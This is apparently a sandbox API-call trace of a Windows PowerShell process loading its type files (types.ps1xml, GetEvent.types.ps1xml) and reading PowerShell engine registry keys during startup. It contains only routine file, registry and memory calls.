	[0788.104] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1ad2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0788.104] SetErrorMode (uMode=0x1) returned 0x1
	[0788.104] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1ad4d0 | out: lpFileInformation=0x1ad4d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0788.105] SetErrorMode (uMode=0x1) returned 0x1
	[0788.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0788.105] SetErrorMode (uMode=0x1) returned 0x1
	[0788.105] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad4d0 | out: lpFileInformation=0x1ad4d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0788.105] SetErrorMode (uMode=0x1) returned 0x1
	[0788.107] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0788.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0788.107] CoTaskMemFree (pv=0x3cba10) 
	[0788.108] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0788.108] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0788.108] CoTaskMemFree (pv=0x3cba10) 
	[0788.109] GetACP () returned 0x4e4
	[0789.222] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0789.222] SetErrorMode (uMode=0x1) returned 0x1
	[0789.224] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0789.225] GetFileType (hFile=0x30c) returned 0x1
	[0789.225] SetErrorMode (uMode=0x1) returned 0x1
	[0789.225] GetFileType (hFile=0x30c) returned 0x1
	[0789.229] ReadFile (in: hFile=0x30c, lpBuffer=0x2d72860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2d72860*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0789.232] ReadFile (in: hFile=0x30c, lpBuffer=0x2d72860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2d72860*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0789.232] ReadFile (in: hFile=0x30c, lpBuffer=0x2d72860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2d72860*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0789.232] ReadFile (in: hFile=0x30c, lpBuffer=0x2d72860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2d72860*, lpNumberOfBytesRead=0x1ad408*=0xcf3, lpOverlapped=0x0) returned 1
	[0789.232] ReadFile (in: hFile=0x30c, lpBuffer=0x2d71cbb, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2d71cbb*, lpNumberOfBytesRead=0x1ad408*=0x0, lpOverlapped=0x0) returned 1
	[0789.232] ReadFile (in: hFile=0x30c, lpBuffer=0x2d72860, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2d72860*, lpNumberOfBytesRead=0x1ad408*=0x0, lpOverlapped=0x0) returned 1
	[0789.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0789.235] SetErrorMode (uMode=0x1) returned 0x1
	[0789.235] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad380 | out: lpFileInformation=0x1ad380*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0789.235] SetErrorMode (uMode=0x1) returned 0x1
	[0789.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0789.236] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad468 | out: phkResult=0x1ad468*=0x30c) returned 0x0
	[0789.236] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad3ec, lpData=0x0, lpcbData=0x1ad3e8*=0x0 | out: lpType=0x1ad3ec*=0x1, lpData=0x0, lpcbData=0x1ad3e8*=0x56) returned 0x0
	[0789.236] CoTaskMemAlloc (cb=0x5a) returned 0x3b28c0
	[0789.236] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad3bc, lpData=0x3b28c0, lpcbData=0x1ad3b8*=0x56 | out: lpType=0x1ad3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad3b8*=0x56) returned 0x0
	[0789.237] CoTaskMemFree (pv=0x3b28c0) 
	[0789.237] RegCloseKey (hKey=0x30c) returned 0x0
	[0789.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0789.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1acf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0790.414] VirtualQuery (in: lpAddress=0x1ac150, lpBuffer=0x1ad010, dwLength=0x30 | out: lpBuffer=0x1ad010*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0790.424] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0790.425] GetFileType (hFile=0x30c) returned 0x1
	[0790.425] SetErrorMode (uMode=0x1) returned 0x1
	[0790.425] GetFileType (hFile=0x30c) returned 0x1
	[0790.425] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0790.429] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0790.429] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0790.429] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0790.430] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0790.430] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0790.430] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0790.430] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0790.430] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.240] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.240] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.240] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.241] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.241] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.241] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.242] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.242] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.245] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.245] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.245] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.246] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.246] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.246] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.246] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.247] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.247] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.247] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.248] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.248] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.248] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.249] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.249] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.249] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.262] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.262] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.263] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.263] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.263] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.264] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.264] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.264] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1000, lpOverlapped=0x0) returned 1
	[0791.265] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x1b4, lpOverlapped=0x0) returned 1
	[0791.265] ReadFile (in: hFile=0x30c, lpBuffer=0x2dd9a20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad408, lpOverlapped=0x0 | out: lpBuffer=0x2dd9a20*, lpNumberOfBytesRead=0x1ad408*=0x0, lpOverlapped=0x0) returned 1
	[0791.265] CloseHandle (hObject=0x30c) returned 1
	[0791.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0791.265] SetErrorMode (uMode=0x1) returned 0x1
	[0791.265] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad380 | out: lpFileInformation=0x1ad380*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0791.266] SetErrorMode (uMode=0x1) returned 0x1
	[0791.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0791.266] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad468 | out: phkResult=0x1ad468*=0x30c) returned 0x0
	[0791.266] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad3ec, lpData=0x0, lpcbData=0x1ad3e8*=0x0 | out: lpType=0x1ad3ec*=0x1, lpData=0x0, lpcbData=0x1ad3e8*=0x56) returned 0x0
	[0791.266] CoTaskMemAlloc (cb=0x5a) returned 0x1b826390
	[0791.266] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad3bc, lpData=0x1b826390, lpcbData=0x1ad3b8*=0x56 | out: lpType=0x1ad3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad3b8*=0x56) returned 0x0
	[0791.266] CoTaskMemFree (pv=0x1b826390) 
	[0791.266] RegCloseKey (hKey=0x30c) returned 0x0
	[0791.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ad0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0791.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1acf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0797.522] VirtualQuery (in: lpAddress=0x1ac150, lpBuffer=0x1ad010, dwLength=0x30 | out: lpBuffer=0x1ad010*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0798.575] VirtualQuery (in: lpAddress=0x1ac150, lpBuffer=0x1ad010, dwLength=0x30 | out: lpBuffer=0x1ad010*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0800.460] CoTaskMemAlloc (cb=0x104) returned 0x3cba10
	[0800.460] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cba10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0800.460] CoTaskMemFree (pv=0x3cba10) 
	[0801.356] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad608 | out: phkResult=0x1ad608*=0x304) returned 0x0
	[0801.356] RegQueryValueExW (in: hKey=0x304, lpValueName="path", lpReserved=0x0, lpType=0x1ad61c, lpData=0x0, lpcbData=0x1ad618*=0x0 | out: lpType=0x1ad61c*=0x1, lpData=0x0, lpcbData=0x1ad618*=0x74) returned 0x0
	[0801.356] RegQueryValueExW (in: hKey=0x304, lpValueName="path", lpReserved=0x0, lpType=0x1ad58c, lpData=0x0, lpcbData=0x1ad588*=0x0 | out: lpType=0x1ad58c*=0x1, lpData=0x0, lpcbData=0x1ad588*=0x74) returned 0x0
	[0801.356] CoTaskMemAlloc (cb=0x78) returned 0x3504e0
	[0801.356] RegQueryValueExW (in: hKey=0x304, lpValueName="path", lpReserved=0x0, lpType=0x1ad55c, lpData=0x3504e0, lpcbData=0x1ad558*=0x74 | out: lpType=0x1ad55c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1ad558*=0x74) returned 0x0
	[0801.357] CoTaskMemFree (pv=0x3504e0) 
	[0801.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1ad2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0801.357] SetErrorMode (uMode=0x1) returned 0x1
	[0801.357] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1ad4e0 | out: lpFileInformation=0x1ad4e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0801.357] SetErrorMode (uMode=0x1) returned 0x1
